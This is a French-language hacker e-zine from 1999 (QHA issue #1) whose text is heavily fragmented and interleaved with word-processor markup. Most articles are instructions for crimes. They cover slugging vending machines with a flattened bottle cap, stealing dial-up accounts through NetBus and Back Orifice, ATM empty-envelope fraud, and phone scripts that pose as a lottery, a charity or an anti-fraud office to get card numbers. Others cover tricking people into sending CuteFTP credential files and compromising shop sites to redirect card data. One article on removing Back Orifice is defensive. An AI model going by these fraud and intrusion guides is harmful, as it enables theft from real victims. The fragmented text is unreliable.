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illeur vue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ourier New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QQQQQQQ\    |HH|   |HH|  /AAAAAAA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HH|  |AA|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QQQQ|   |HH|¯¯¯|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  |HH|   |HH|  |AAA| |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E-Zine #1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http://www.q-h-a.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   hackmag@technologist.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Voila!! c'est partie, QHA lance son propres e-zine. Le premier magazine est rédig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r £c0nfuz3d£ et Mysker mais les suivants ne seront fais que par £c0nfuz3d£.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orderons le plus de sujet possible a propos des champs d'action de QHA. Car QHA n'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s seulement une association de hackers, nous sommes plutot un organisme de jeunes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alentueux webmasters, programmeurs, artistes, crackers, hackers, etc. qui veu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onner de leur temps pour vous offrir tout de ce qui s'offre sur l'Internet, ayan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qualité et avec un excellent support tech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Membres de Q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kester  QHA`s m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lchoix   QHA`s vice presid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ckers:                                                                                    Technicien / Programmeur / Sh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ysker</w:t>
        <w:tab/>
        <w:t xml:space="preserve">     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">                                                                                 </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>N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MeR-EliMiNaToR</w:t>
        <w:tab/>
        <w:t xml:space="preserve">                                                                                                Siri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0nfuz3d£</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                                                                                                Yo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ÐJ TerrørCøre© :.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">                                                                                                {mAd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lad Strife</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                                                                                                 Steph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lfang</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                                                                                                 [_}{Ead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GoOd</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                                                                                                 Serv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sk`[D]ru|d^                                                                                                                        FILA6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rnel`</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                                                                                                                 Infer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z[YL]uM*iNM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archy / Phreaking / Carding :                                                                  Warez / Radio / Ser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J4RL4}{L3                                        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">                                   BBZ</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                               </w:t>
        <w:tab/>
        <w:t xml:space="preserve">       Master-_-</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">                                                                   Sp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uNLeAsHED                                                                                     Bur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ysker (conaissance seulement)                                                  [oas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I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lb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catom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euillez prendre note que tout ce qui est inscrit dans ce qui suit n'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a but educatif. Les auteurs de ces articles retirent la responsabilite de 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e vous en faites. En bon quebecois "C pas notre probleme sti". Et avan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tinuer n'oubliez pas que vous n'avez aucun droit de copier ces artic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ute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_}{Ead_]     </w:t>
        <w:tab/>
        <w:t>(head_53@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c0nfuz3d£    </w:t>
        <w:tab/>
        <w:t>(resetboy@writem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Polchoix      </w:t>
        <w:tab/>
        <w:t>(Polchoix@heh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Bilb0         </w:t>
        <w:tab/>
        <w:t>(WhiteForce@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ukester      </w:t>
        <w:tab/>
        <w:t>(dukester@heh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ster-_-</w:t>
        <w:tab/>
        <w:t>(rinfret@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ysker                  (root@fbi.go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d Strife             (clad_strife@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orgal                 (clad_strife@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HA Men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  Une tite liqueur gratos?? :::::::::::::::::::::Wr: [_}{Ead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2  Comment piquer une connection internet!! ::::::Wr: £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3  Comment se faire du cash facile :::::::::::::::Wr: Polcho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4  Warez #1 ::::::::::::::::::::::::::::::::::::::Wr: Bilb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5  Programmation sous Visual Basic 101 :::::::::::Wr: Duke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6  Les failles WinGate ::::::::::::::::::::::::::::::::Wr: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7  Se désinfecter de Back Orifice ::::::::::::::::Wr: [_}{Ead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8  Comment voler des access ftp ::::::::::::::::::Wr: £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9  Carding 101 :::::::::::::::::::::::::::::::::::Wr: Master-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0 CC sans trop rusher  :::::::::::::::::::::::::::::::::::Wr.Mys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1 Hacker un compte hotmail :::::::::Wr.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2  Nuke/Lamer/Protocol :::::::::::::::::::::::::::Wr: [ALIENS]</w:t>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3</w:t>
        <w:tab/>
        <w:t>Chronique Culturelle ::::::::::::::::::::::::::Wr: SPI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14 Quelques petit truc ICQ ::::::::::::::::::::::Wrs: CladStrife &amp; Thorgal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5 Conclusion (£c0nfuz3d£ and Mys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WaterLily&gt; hey elle est partie où là costar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 - Une tite liqueur grat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us sommes le 2 aout 1999, il est 21h00! J'ai soif! Qu'est-ce que je vais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bien rien de mieux que s'acheter quelque chose a boire. Héhéhé. Al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e vais dans ma chambre je regarde mon porte-feuille est je m'appercois qu'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e me reste pu d'argent!!!! Comme chaque enfants dans une famille, nous allons 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tre pere pour lui demande 1,00$. Alors si ton pere te donne de l'argent c good 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e reste a allez l'acheter! Sinon, bien je vais vous donnez un petit truc qui marc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ans les machines a canette au quebec (Je ne sais pas si ce truc marche aussi en F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PeperMint&gt;: Yesss ma pouvoir en avoir full pour 0$         { da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oici les outils que vous aurez de beso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 Un bouchon de Bi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 Un marte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Pour debuter, Tu t'organise pour trouvez un bouchon de biere. Je vais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ide a en trouver un. Tu peux te promener dans les rue et chercher a terre, tu p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llez en chercher un dans les poubelles du voisin ou bien, tu peux tout simp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ttendre que quelqu'un prenne une biere chez t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intenant que tu as un bouchon de biere, tu dois allez te chercher un mart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 ta pas ca t pire que pepermint sti!!). Ensuite avec ton marteau tu applatis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uchon de biere pour qu'il devienne plate..mais pas trop plate car il doit ressemb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un 1,00$ canad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Y te reste plus qu'a mettre ton bouchon de biere a l'endroit ou tu inseres ton 1,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tu auras ta bonne tite liqu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PeperMint&gt;: comment tu fais pour apprendre ç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_}{Ead_]&gt;: jme sert de ce que ta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PeperMin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 [_}{Ead_] , head_53@hot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OriNick&gt; Ya tu dla belles femmes icitte cri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2 - Comment piquer une connection inter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iveau de difficulté: Facile mais ut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 vous etes tanné de vous faire arnaquer par votre ISP, voici la s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ler la connection a quelqu'un au contraire de se que vous pouvez peut-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enser....c tres simple. C'est tres loin du vrai hac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ere ét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rouver quelqu'un infecter par netbus possedant une connection telep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MPORTANT LE CABLE NE FONCTIONNE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ieme ét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ntrer dans l'ordinateur sous netbus et dans le file manager. Uploa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ack Orific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ieme ét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ecuter Back Orifice server a partir de Net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ieme ét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ntrer sous Back Orifice et prendre la liste de mot de pas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ieme ét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rouver le # de modem du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s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oici une liste pour vous ai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ympatic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mos </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>732-1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rthabaska </w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>357-4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écancour</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>294-9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elleterre</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>622-1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ibougameau</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>748-8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icoutimi</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>696-1638/696-484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israeli</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>449-5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rummondville</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>472-22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ranby</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>777-4400/777-309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ull</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>350-1638/567-919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les de la Madeleine</w:t>
        <w:tab/>
        <w:t>986-403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Guadeloupe</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>459-3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Malbaie</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>665-22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Sarre</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>339-7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Tuque</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>676-864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ont-Laurier</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>623-94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ontréal</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>350-1638/350-163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bec</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>644-1638/644-40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iviere du Loup</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>860-3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ouyn Noranda</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>762-16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Jerome</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>432-1638/432-81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erbrooke</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>829-1638/829-943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rois-Rivieres</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>694-1638/694-610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ut ==&gt;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>1-888-890-238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outicat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ouiseville </w:t>
        <w:tab/>
        <w:tab/>
        <w:t>228-007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geco Teleph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ma</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>622-59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Hyacinthe</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>774-20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rois-Rivieres</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>693-182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ideot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icoutimi</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>545-72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ranby</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>534-05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ull</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>772-929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ontreal</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>599-27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ébec</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>521-55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erbrooke</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>562-186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rois-Rivieres</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>693-18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n fait le principe est extremement simple. Back Orifice récupere pour vous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ichiers .pwl. Ces fichiers contiennent la plupart des mot de passe du syst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and vous faites l'option enregistrer le mot de passe dans un programme, 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e stock dans se genre de fichier). Ce n'est pas plus compliquée que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c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ves Sympatico c'est encore plus facile de recuperer l'acces...Il suffi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ownloader accinfo.txt dans le repertoire C:\Programs Files\Sympatico\User1 pour a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outes les informations sur la connection. Alors n'oublier pas de verifier si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ersonne a temps illimité avant pour ne pas lui faire payer 250$ au bout du m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S: j'apprecirais ne pas voir de remarque du genre "Vous etes lames!!!!! Vous par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 trojans dans votre e-zines... Ce magazine devrais contient des articles pour t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s niveaux de difficulté. Ceci est peut-être simple a vos yeux mais peux ê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mpliqué pour un débu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HaCkEr FrOm ThE PuNk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OriNick&gt; cogeco c de vrai h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Out*****  Ceci comme le dirais au debut que l`article n`est pas du PURE HAC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3 - Comment se faire du cash fac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i n'a jamais rêver de se faire de l'argent facilement?!?!?! et bien je vais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nner quelques petits trucs qui marche des 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remierement avec l'arrivée des guichets automatique, rien de plus fac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faite comme si vous voulez faire un depot vous metter rien dans l'enveloppe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marquer qu'il y a 500$... Ensuite, vous la deposer... Ca va automatiqu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ugmenter vos $$$ mais avant qui se rende compte quils ont recu une enveloppe v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ls sauront pas cest qui pcq les enveloppe tombe toute a la meme plac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nc vous retirer 500$ et le tour est jouer vous venez de vous faire 500 bal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ussi comment avoir des # de cartes de credit facilement?!? facile!!! Vous a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 canada411.com et vous choississez qqun au hasard et vous appelez et vous d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r ex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gt; c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 ==&gt; t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 all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 Bonjour je travail pour LOTO-QUEBEC et nous nous sommes associer avec visa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stercard et nous fesons un concours, cest le plus gros au pays, nous pigeon 5 # p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emaine et nous appelon les gagnants </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Plusieur personnes savent pas que t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eux faire qqchose avec le # sans la carte donc 1 personne sur 10 environs est ass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 pour accep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n autre truc qui marche plus souv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all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 Bonjour je vous appele au nom de Normand Bratwaight pour l'association de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ralesie cerebrale du </w:t>
        <w:tab/>
        <w:t xml:space="preserve">quebec (Ou de marie-soleil tougas pour </w:t>
        <w:tab/>
        <w:t xml:space="preserve">enfant soleil),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remercion d'avoir donner l'an passe </w:t>
        <w:tab/>
        <w:t xml:space="preserve">(Meme si yont pas donner y v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re content pcq y pense qu'on pense qui ont donner hehe) et nous nous </w:t>
        <w:tab/>
        <w:t xml:space="preserve">demand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 vous aviez encore la gentillesse de do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Cest pour une bonne cause comment ref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 vous payer par mandat - poste ou par c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mandat po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 : desoler mais nous avons eu des probleme lan passer et je vous suggere for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r c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 y reponde mandat poste tu raccro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e vous jure que en 1heure si vous avez pas un # de cc ya qq chose qui marche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 ~POLCHOIX~ Polchoix@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skelter&gt; VIVE OZZY PI LES BEAT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4 - Warez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é oui cette chronique va parler de warez... Mais la n'ouvrez pas votre cl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TP car je ne donne pas de site leech perm avec 0-day... Bon pour commencer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lons expliquer les termes utiles pour tout bon warez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ech = Qui ne contient pas de ratio ( vraiment cool ;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atio = Un quota établie par le Site Op afin d éviter les leecheur ( ceux qui f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uste d/l (downloader) ). Un Ratio  etablie avec le nombre de meg ou de file.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terminons le ratio comme une fraction. Le premier chiffre est pour le nombr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eg besoin pour avoir le nombre de meg qui a apres. Ex Ratio 1:3 (le ratio le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tiliser dans tous les bon groupes) veut dire que chaque meg envoier de perme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l 3 meg ( Amusant non ??? ;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erm = Un Site FTP qui ne ferme jamais ou presque. On peut aussi utiliser le ter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ivant 24/7 qui veut dire 24h sur 24 et 7 jours sur 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p Mask = C'est le dns qui faut donner au Site Op pour que ca soit juste notre ip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eut acceder a son FTP avec notre propre login. Mais bien sur il a des dns qui chan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out le temps alors nous determinons avec une coupe de reconnection sur le net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iffres qui ne change pas de notre DNS et a l aide de petite    astérisque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chons les chiffres qui change tjrs. Ex: 207.15.**.*** ( ne penser pas que c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ien ;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0-day = Tous les gogoseses (Appz, Gamez, VCD, PSX, MP3, ISO ) qui est sor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ujourd hui. Nous pouvons se retrouver facile avec ce systeme car sur les FTP t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s 0-day sont classer par date ( kel idée brillant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ppz =  Des applications (programme) qui ont été cracker par nos supremes crack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l beau boulot ;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amez = Des jeux qui ont été cracker par les meme style de crac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CD = Des Vidéo qu on retrouve sur des CD. Nous retrouvons tous les sortes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idéo (Film encore au cinéma, XXX, Des clip vidéo, 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SX = Des jeux de plas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P3 = Tout le monde sait c koi. Mais d un coup qui a le premier des lamer qui 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it ben c des musik que l on retrouve dans un ptit format tres c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SO = On peut i retrouver des appz ou des gamez. Mais contrairement aux autres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ogiciels que vous d/l ( si vous en d/l avec votre 56k ou moins vous etes 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raquer mental ;oP ) ceux-ci sont la version original que nous pouvons retrouver s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 CD kan tu l achete. Car les gamez ou appz il a tjrs des bout de couper. Parf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musique ou les speech ou bien les video add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 arretton de parler des differents langage que nous i retrouvons souvent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s groupe warez. Mais plutot pkoi pas parler des groupe en tant que tel B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 simple un groupe warez est un rassemblement de personne qui font une taches a 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est tres rare qu un groupe garde les ptits lamers qui font jamais rien et qui f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uste d/l comme des osti malade. Car pour que le groupe se tienne debout il ne faut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uste des d/ldeur. Qu'est-ce que vous en penser ?? Alors vous commencer a ent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ans le warez et vous apprecerier bcq rentrer dans un groupe mais vous ne sav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s comment ou koi faire pour i rentrer. Ben c simple, vous avez juste a trou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n groupe warez qui sont en plein recruitement ( c vrai que c pas facile, mais av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 l effort vous i parviendrai je suis sur ). Apres avoir spotter un bon groupe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semble correct vous demander a quelque sur le channel qui qui s occupe d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cruitement ou souvent sur le channel il a un bot qui vous dit de faire !nf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ou ben !app. Le NFO est un .nfo qui donne des information sur le groupe genre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ounder, ect. Le App est un txt (ou ^programme) que le groupe fait pour que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ussiez rentrer vos petites information necessaire pour fair partir du groupe. M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ans le App vous voyer Courier, SiteOP, Bot Master, Cracker, pis vous savez pas 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oi ben lisez le reste ;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ourier = P'tit gars qui transfert des données entre 2 FTP (non le votre) avec un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rogramme FXP ( moi j utilise FLASH FXP, entk c lui que jtrouve le meilleur car FX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8.0 chie tjrs, genre gros gelage d ecran ). Mais la allez pas penser que vous a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unner pareil a la vitesse que tu d/l avec ton pauvre ptit 33.6 ben non vous all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 vitesse que font les 2 site ensemble. C pas merveilleux non ?? ;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te OP = P'tit gars ben riche qui a une bonne connection ( souvent LNPA et plu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ouvent sous linux qui est brancher tout le temps ( bien sur qu il a des fois mou qu'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eut le fermer, mais il le ferme le moins souvent possbile car sinon il va se f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nvoyer. Pis ce p'tit gars la offre sont beau HD souvent 3-4 car les groupes on beso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 bcq de place et la a l aide des courier il recoit tout le bon stock genre 0-day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ut. (entk ce que lui de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racker = Si vous le savez pas ben retourner a l ecole calis. En fait c un g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ller en osti qui crack ( qui pirate les logiciel )les appz, gamez, ISO, p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s publ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t Master = P'tit gars qui a un grand coeur et qui donne ses bot pour un grou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our pas qu il soit Take Ove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 si vous etes pas capable a rentrer dans un groupe ben voici ce que vous pou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aire c est d aller dans les channel ou qu on peut retrouver des pub s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TP ouvert a tout le monde pour distribuer les logiciels) et vous leecher comme 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omcombre. Mais fait gare car les Pub Site sont kaisment tjrs rempli de lamer qui d/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omme des fou et qu il n arrete pas. Mais il a aussi pas xdcc que vous pouver a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s gugusses. C'est un bot qui vous donne une commande a faire avev le # de packet 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désirer avoir ( les channels sont rendu avec plein de bot comme ca alors c fac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 trouver ) Mais il a aussi le truc de se faire des "Friends", ce principe est t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ur mais une fois faite vous pouver d/l dans la joie totale. Ce principe consist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mander a du monde s il pourais pas vous faire un ptit acces sur le FTP qui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aturellement de bonne qualité et qui a une assez bonne vitesse. Mais meme a ca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gars que vous avez poigner doit etre pas le parfait bonhomme qui donne tout sans r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cevoir. Uploader si des files une fois de temps en temps pis le tour est jouer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vez un bon FTP pas trop cher ;o) Mais avant essaier donc de rentrer dans un grou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faire du courier, car mek que les  groupes grossise ben le warez va aller mi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p-e qu un jour nour verrons le putain de ratio s enlever et sa va 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UT LE MONDE CA GO !!!! YAH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 c'est pas mal ca la vu que j ai pas mal tout dit fak la j'va i aller pour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p 3 des jeux ou autre que je trouve de mon gout assez b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3 = Essaier Mechwarrior 3, si vous avez jouer aux 2 autre vous all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ir beaucoup d ammilioration que j apprecie bcq !!! (P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2 = Essaier Hidden &amp; Dangerous, méchant bon jeu de stratégie. Vous avez bc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mez commandos ?? Ben c le meme style mais en 3D. TROP COOL (P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1 = Essaier DRIVER (aucun commentait essaier le c treop genial) (PS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on ben ceci conclu mon article pour le # numéro car deja j ai pu rien a dire fak jva vous laisser pis D/L comme des POR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Bilb0 [Bounty Hunter] [NoT EnOuGh MeM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ntaire ou autre: WhiteForce@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FrOgMaN&gt; la marche des vertueux est semén d'obstacle qui sont les entreprises égoïs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fin sans fin surgir l'oeuvre du mal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5 - Programmation sous Visual Basic 1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rogrammer avec VB c'est tres simple, c'est meme un des language de program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s plus facile que je connaisse saufe que c'est tres pratique et tu je dit qu'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it commencer par qqc un jour alors aussi bien commencer par Visual Bas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oi j'va commencer en vous expliquant un peu le principe pour tres debu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B est tres visuel, tu dessine quasiement le tout de ton programme, tu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s dessin ou tu veut etc etc tu le crée avec la souris... une fois que tu a cr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 programme comme tu le veut la sa devient un peu plus complexe... Tu doit a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ans les codes, premierement si tu double click dans le background de ta forme t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a te ramasser dans le 'form_load' les codes que tu ecrit la c'est tout ce q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era executer a l'ouverture, comme par exemple: form1.visible = true ce q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gnifie que sa form1 sera visible. Pour donner une commande a quelque c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ans ta form tu n'a qu'a double clicker dessus comme pour le 'form_load' et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ssant tu peut changer le 'load' par quelque chose d'autre comme 'resize'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lick' ce qui désignera un moment d'action different que a l'ouverture de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orm. Une fois que tu a choisi a quel moment tu veut donner une action a quel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oses pour choisir ce qui se passera a ce moment tu n'a qu'a ecrire le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la chose ou de la "form" que tu veut utiliser et placer un point (.) pa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ite et ensuite ecrire l'action que tu veut qu'y se réalise ou bien latri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tu veut y changer comme par exemple Form6.width = me.width - 100 sa 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apetisser la largeur du form6 de 100 pix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Une autre commande bien utile aussi est 'Load' et  aussi 'Unl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r exempletu met: Load form6 dans le 'form_load' du form1 pour charger la form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louverture du form1 sans la montrer juste la charger Unload est le contr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ehe c'est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ssi une autre chose de bien pratique en VB est le timer, tu met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imer ou que se soit (on le vera pas dans le programme) et tu set son "interv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m milliseconde donc 1000=1 seconde) pour decidé en combien de temps il do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commencer l'operation qui lui est destiné. Pour ce dernier double click su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imer et accorde y une fonction comme image1.visible = true par exemple, donc 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u met une image6 et que tu la met visible elle deviendra visible mais oublie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arreter l'operation avec les timers car (avec la derniere exemple) l'image6 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js revenir a l'interval demander pour l'arretter tu ecrit dans le code du ti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dmeton que sont "name" cer timer1) timer1.enabled = false apres lotre com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c'est tjs un peu repetitif, tu n'a qu'a ecrire l'action que tu veut a l'af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tu veut. Le truc c'est de pas manquer d'imag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est tout pour cette fois... J'en parlerai plus en profondeur la proch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ois. Si vous desirer plus d'info sur la programmation en VB e-mailer moi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ukester@hehe.com et je vais voir si je peut vous aid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Dukester dukester@heh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Starbuck&gt; black sabbath cetais quesiment un mouvement anti beatt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6 - Les failles de Wing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Gate est un programme qui permet à des ordinateurs sous WindowsNT ou Win9x de partager la même conection internet. cependant ce programme présente des failles. Par exemple. On sait que WinGate utilise le port 8010. Ainsi pour voir ce qu'un serveur a sur ses drivers on tape dans la barre de navigation d'un naviga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ttp://www.urlNT.com:8010/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ttp://www.urlNT.com:80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ttp://www.urlNT.com:80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à... Mais on peut aussi utiliser les failles Wingate pour se faire anonymizer lors d'une session telnet. ex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s le serveur WinNT ou 9x, sous telnet sur le port telnet, vous tap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gate&gt; www.urlàjoindr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t vous voilà anonymizé par l'IP du serveur qui aura cru que vous étiez un de leurs postes en rés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ur conclure cet e-zine je dirais qu'il faut savoir faire marcher sa tête, et qu'on arrivera à rien sans ç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Mysker&gt; YAHHH W ru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7 - Se desinfecter de Back Or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1. Vous connaissez un virus nomme Back Orifice (BO)? Et bien BO a ete lance il y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elque mois pour faire reflechir les gens sur certaines failles de securite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in 95/98.  BO utilise le port 31337. Aujourd'hui j'ai decide de vous en par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r je suis vraiment tanne d'aide le monde pour ce Vir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Explication du propag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2. Pour ce propager, BO ce cache dans les fichiers telecharges. Ensuite il s'insta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n douce et attend qu'on le run. Une fois ce fichier ouvert les pirates en herbe sont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esure de s'introduire par internet dans votre P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mment l 'elimi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3. Avant de commencer je veux vous dire que nous irons jouer dans le reged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e n'est pas un jeu...si vous delete un mauvais key et ben vous aurez peut-etr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 grosse misere avec votre PC. (Pas dure.. Y rebootera peut-etre p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4. Pour debuter nous devons savoir si nous sommes reellement infecte de ce troj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us devons alors proceder a une verification dans l'editeur de la base des regist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remierement clickez sur DEMARRER ensuite EXECUTER et tape le mot REGEDIT et pes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ur OK. Une fois rendu dedans vous faites un double click sur l'icone a gauch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KEY_LOCAL_MACHINE. Ensuite utilisez la meme facon pour penetrer dans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ICROSOFT, WINDOW, CURRENT VERSION, RUN SERVICES. A droite nous remarquons </w:t>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il y a une fenetre ou apparait entre parentheses et en italique le mot def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l y a une valeur de definie a la droite il y a de forte chance que vous soy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fecte du virus Back Orifice et si cette inscription ressemble a «.exe» on est cer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l'a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5. Dans un deuxieme temps nous allons dans C:\WINDOWS\SYSTEM ou nous recherchons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ichier sans nom (comme si le nom du fichier etait invisible). Ce fichier doit avo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ne grosseur de 122K. Si vous avez ce fichier vous avez encore une forte chance d'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fecte du virus Back Orifice. Ensuite fouillez encore dans ce meme repertoire pour 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rouver un fichier WINDLL.DLL qui est genere par BO a chaque demarage du sys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 vous  trouvez ce fichier vous avez encore une forte chance d'etre infecte de ce vir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S.: Nous avons encore rien delete du regedit et du c:\windows\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6. Une fois ces deux etapes terminees nous retournons dans le REGEDIT (Utilisez la m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acon que je vous ai montre. Paragraphe #4) Une fois rendu nous allons delete la l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ou apparait (default) .exe. Ensuite nous refermons tout le regedit et nous retourn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ans le C:\WINDOWS\SYSTEM pour y detruire le fichier «sans nom» de 122K et le fi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DLL.D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7. Voila! Y vous reste juste a rebooter votre PC et il n'y devrais pu avoir de tr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 BO. Simple non??...tk... Si tu veux pas l'avoir de nouveau et ben installe d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s n'importe quoi sur ton PC ca aiderai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 [_}{Ead_] , head_53@hot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Vai[69]&gt; criss que le monde est may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8 - Comment voler des access ft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rinci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voici un petit texte tres simple pour pratiquer son social engeene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principe est très simple....Il suffit de convaincre quelqu'un de nous envoyer sont fi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ee.dat ou smadata.dat depandant de la version de CuteFtp. Bien sur il vous faut au moins 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sion de cuteftp  d'installer. Ensuite il suffit de remplacer son fichier .dat par celui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 victime et voila vous avez tout ses  comptes ftp et leur mot de passe. Ca peut devenir trè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essant si la personne possède une page Web ou si elle fais du warez car vous pouvez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re de beau account tout a fais gratuitement. Aussi, j'ai déja vu des access ftp sur le IS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la vicxtime, alors une connection gratuite en plus. Ce truc est simple et marche enc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lativement bien alors pourquoi ne pas l'util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ruc et Astu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acon de récuperer le fichier tant convoi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IR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ller sur un gros channel lame (ex:#montreal)  et dites que vous avez un probl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vec votre cuteftp et il vous manque un fichier. Un bon samaritain va venir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sister, va vous l'enoyer et ca va etre reg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t;Karina&gt; bonjour j'ai effacer un fichier de cuteftp a mon frere et il va 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acher car ca ne marche plus, quelqu'un peu m'aider? /msg m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8] &lt;BY&gt; t est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ou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8] &lt;BY&gt; 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9] &lt;BY&gt; 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9] &lt;BY&gt; tu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c smadata.dat qui me faudr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pas .b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9] &lt;BY&gt; c est la meme c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09] &lt;BY&gt; tu verr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tu na pas le .d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1] &lt;BY&gt; c est la meme c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1] &lt;BY&gt; c est quoi l au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smadata.d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il y a une dif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pcq smadata.bin ne marche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2] &lt;BY&gt; j ai lautre fi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3] &lt;BY&gt; tree.d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4] &lt;BY&gt; `ca mar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ou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4] &lt;BY&gt; t a besoin de l au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sa serais p-t mi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5] &lt;BY&gt; att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6] &lt;BY&gt; `j ai smdata.d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c ca qui me f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8] &lt;BY&gt; t a quel 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t;Karina&gt; 13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9] &lt;BY&gt; fais attention la prochaine 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9] &lt;BY&gt; ok by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0:19] &lt;BY&gt; xx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voila un bon ex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e n'est pas vraiment plus compliquer que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autre methode c'est de s'introduire dans son disque dur ou d'aller chez eux pis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 copier mais c'est beaucoup trop compliquer tandis qu'on peux se le faire do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entiment =) (la solution la plus simple est toujours la b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ors Essayer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HaCkEr FrOm ThE PuNk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FrOgMaN&gt; béni soit il l'homme de bonne volonté qui au nom de la charité se fait le ber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 faibles qu'il guide dans la vallée d'ombre de la mort et des larmes car il est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rdien de son frère et la providence des enfants égarré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9 - Carding 1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troduction au car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ien que le carding soit rendu une activitée des plus populaire de ce temps ci s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ternet, l'art du carding demeure peu connu. Il y a diverse facon d'obtenir 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rtes. Soit par des cc generators mais ca.... personellement je trouve ca vra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ul. J'utilise le moyer moyen. Car les cc generator et tout autre moyen on des taux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ussite de 5% a peux pres et ce nest pas stable. La facon que je procede est si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is delicate. Il suffi de hacker un site contenant une place pour acheter des tru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n cout entré dans le site en tant que ROOT , il suffi de modifier l'adresse de renvo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s cc# vers VOTRE email que vous aurai creer spécialement pour l'occasion. Je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uggere hotmail. Par la suite, a chaque fois qu'un client passera sa commande...c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qui receverez a votre email, le formulaire...contenant toute linfo necessaire p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rder. Maintenant que vous possédez cest millier de dollars....comment faire p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assurer de depenser avec sans ce faire coincer....? 1erement vous avec besoin d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ropzone. Cest a dire un endroit ou vous pouvez recevoir ce que vous avez commandé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ison abandoné...ca c le best) 2emement ...si vous commander par internet...modif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jrs votre ip (par fakeip par exemple)....et donner jamais votre email de provi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OL....hotmail....c ok...Et si vous faites des commandes par téléphones...dites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67 nimporte qui de la GRC est capable de retracer ca....alors ca veux d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oit cellulaire....soit telephone public....Avec des cc# vous pouvez commander des C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cdnow.com) radio...tv...revue...pc (dell computer)...bouff (caller du res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ummmm)....mais moi...je men sert plutot pour des choses vraiment utiles...com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s domaine .com.....des unix shell ...(jen ai a la tonnes...LOL) et pour enregist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s prog!!!! Pour echanger des cc# aller sur #carding sur undernet....mais att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échanger seulement qu'avec les OP ou +v.....Si vous etes un bon carder...on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oicera....et qui sais peut-etre....vous serai op un jour...comme m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in de larticle #1 sur le car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rveillez le prochain ezine pour la s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S: Je ne suis aucunement responsable des pépins qui peuvent vous arriver....J'a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ais cet article pour seul but dinformer les g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ab/>
        <w:t>Master-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Pres de section carding pour Q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kiFKIf&gt; c po comme lui masser les p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0 - Carding,sans trop rus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tos requ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Une tete,Ou la tete de son p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Un 25 cent (conse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Un text preparer a l'av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comment avoir des c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La premiere solution et non la moind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iste a chercher dans le botin telephonique, vo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uvre vic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nez une personne au has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nons par exemple Beaulieu Andre,il va etres marquer quelques chose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aulieu Andre 6732 deSerres......123-45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s ce qui vous interesse c`est le # de tel,123-45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aller donc composer son # de telephone dans une cabine telephonique(de  prefe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is la vous lui dites ex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s =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L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s-Bonjour Monsieur Beauli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Oui c`est bien moi!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Qu`est-ce qu`il y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s-Je travaille pour le bureau anti-fra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t nous penssons que votre cart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redit a ete frauder,pourriez vous nous &lt;--- Parler comme un proffessionel et essayer de pas rire au tel,sinon peine perd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isser votre # de carte de credit ain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e la date d`expiration,ce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 prendre quelques minutes a verif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ns l`ordin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Un instant s`il vous plait        &lt;--- Le pove type desepere laisse son # de carte en esperant  que "Nous" pouvons faire quelques Qulques minutes apres...                Cho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il vous as refile son # de carte de cred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s-Pardonnez moi ce n`etais qu`un erreur de person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tre date d`expiration de carte est bien le (ce qu`il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s)...                                                                    &lt;----Puis la vous reverifier la date d`expiration pour voir si t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Oui c`est bien ca!                                                                  est corr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s-C`est correct pardonner notre erreur                    &lt;---- Bingo,le tours est jouer vous avez tous ce qu`il f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rci!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ec ceci vous pouvez vous ache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s ce qui vous passe par la tete (Mais en ab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trop quand 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eille:Je vous conseille d'utiliser le # de carte environ 2 jours ap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pelle pour ne pas que la personne est trop de doute sur ce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truc fonctionne reelement j`ai tester par moi meme et n`essayer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s trop rire au telephone, parce qu`il y en a vraiment des stup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s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ot@fbi.go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Mysker&gt; La facon dont 912 a hacker s`te gars la?Ben c`est wzGATE ki est aller chez lui a opener un troj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is meme ak le trojan y`etais pas capable de rentrer alors ya fallu que wzGATE ouvre fenetre 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is fasse un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WCrew&gt; Ca m`etonne 